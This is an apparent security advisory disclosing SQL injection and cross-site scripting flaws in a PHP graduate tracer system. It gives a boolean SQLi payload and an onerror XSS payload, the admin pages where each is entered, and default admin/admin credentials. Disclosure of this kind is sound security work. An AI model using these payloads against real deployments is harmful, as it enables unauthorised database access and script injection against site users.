Online Graduate Tracer System for College of ICT Alumni - Vulnerability SQLi + XSS

2023.03.12

Credit: Eren Arslan

Risk: Medium

Local: No

Remote: Yes

CVE: N/A

CWE: N/A

# Title: Online Graduate Tracer System for College of ICT Alumni - Vulnerability SQLi + XSS
# Author: @Eawhitehat - Eren Arslan
# Demo available : https://www.sourcecodester.com/php/15904/online-graduate-tracer-system-college-ict-alumni.html
# CVE: N/A
# XSS
# Screenshot : https://prnt.sc/kYTkGywBEgll & https://prnt.sc/z1XXVFuf58zg

Used Payload :
SQLi: )%20or%20('x'='x
XSS: <image/src/onerror=prompt(8)>

Demo Account:
Username: admin
Password: admin

Method :
Connect to panel : http://localhost/admin

#SQLi

1. After login, go to ../admin/admin_cs.php (BSCS Alumni page)
2. Add the payload in search form for exec the error -> )%20or%20('x'='x

#XSS

1. After login, go to ../admin/add_acc.php (Manage account)
2. Click "Add New" and paste the payload in Username/Name -> <image/src/onerror=prompt(8)>

See this note in RAW Version

Vote for this issue:

50%

Thanks for you vote!

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.

Nick (*)

Email (*)

Video

Text (*)

(*) - required fields.

{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1

{{ x.comment }}

Online Graduate Tracer System for College of ICT Alumni - Vulnerability SQLi + XSS

Thanks for you vote!

Thanks for you comment!Your message is in quarantine 48 hours.

Thanks for you comment!
Your message is in quarantine 48 hours.